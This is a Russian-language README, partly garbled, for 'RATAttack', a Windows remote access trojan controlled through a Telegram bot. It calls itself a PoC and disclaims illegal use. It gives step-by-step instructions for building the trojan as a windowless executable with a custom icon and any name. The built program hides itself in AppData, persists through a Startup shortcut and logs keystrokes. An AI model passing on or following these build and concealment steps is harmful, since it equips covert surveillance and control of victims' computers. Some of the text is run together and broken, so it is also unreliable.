
Инструмент удаленного пост-взлома Windows через Telegram
Удалённый инструмент пост-эксплуатации Windows через Telegram (Python 2.7), Изначально создан Ritiek, форкнут и модифицирован mvrozanti, а затем мной.
Вся цель этого инструмента — продемонстрировать (в качестве "PoC") управление уже скомпрометированной машиной через Telegram. Как и в случае с моими уже написанными инструментами, я не пропагандирую незаконную деятельность.
Эта модифицированная версия использует Telegram bot API v2 вместо традиционной v1. Основное изменение — кнопки клавиатуры вместо ввода текста. Я постараюсь добавить новые функции, исправить ошибки и обеспечить совместимость с API v3 после внесения необходимых изменений от "mvrozanti". А пока команды cd, download, upload, run и delete работать не будут.

file Telegram-ботуТекущие инструменты удалённого администрирования на рынке сталкиваются с двумя основными проблемами:
Этот RAT решает обе эти проблемы с помощью Telegram bot API.
BotFather.pip install -r requirements.txt.64-bit или 32-bit в зависимости от вашей системы.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id из консоли, замените его в скрипте и закомментируйте строку return True. Не волнуйтесь, вы поймёте, когда прочитаете комментарии в скрипте.
Замените путь в compileAndRun.bat (запуск этого файла фактически запустит исполняемый файл)
Выполните `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. Также можно передать `--icon=<path\to\icon.ico>`, чтобы использовать любую собственную иконку.
.exe-файл в C:\Python27\Scripts\dist\. Вы можете изменить имя .exe на любое другое..exe, скрипт скроет себя и заразит ваш ПК, добавив себя в автозагрузку. Вернуть всё к нормальному состоянию можно с помощью опции /self_destruct или вручную удалив каталог C:\Users\Username\AppData\Roaming\Portal и файл C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (хотя сейчас я рекомендую удалять их вручную)..exe-файла, а также местоположение и имя папки, в которой скрытый .exe будет прятаться. Для этого измените compiled_name и hide_folder соответственно.Лицензия MIT
RATAttackkeylogs.txt